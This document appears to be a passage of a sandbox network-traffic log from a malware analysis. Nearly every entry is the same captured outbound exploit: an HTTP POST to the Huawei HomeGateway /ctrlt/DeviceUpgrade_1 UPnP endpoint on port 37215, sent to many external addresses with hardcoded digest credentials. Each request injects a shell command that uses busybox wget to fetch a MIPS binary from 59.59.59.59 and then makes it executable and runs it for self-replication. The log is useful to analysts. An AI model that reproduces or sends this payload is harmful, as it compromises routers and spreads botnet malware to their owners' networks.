                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1183192.168.2.1545338197.43.38.3037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.737023115 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1184192.168.2.1554486126.162.25.21337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.737159967 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1185192.168.2.1554446157.119.137.20237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.737183094 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1186192.168.2.153913241.198.53.6637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.737207890 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1187192.168.2.153781841.154.66.17037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.737258911 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1188192.168.2.155507441.30.26.21437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.737282038 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1189192.168.2.1555292157.228.243.15637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.737648964 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1190192.168.2.1549976157.151.188.9337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.737714052 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1191192.168.2.1553968154.241.167.7837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.737752914 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1192192.168.2.1559504122.99.183.22337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:00.737817049 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 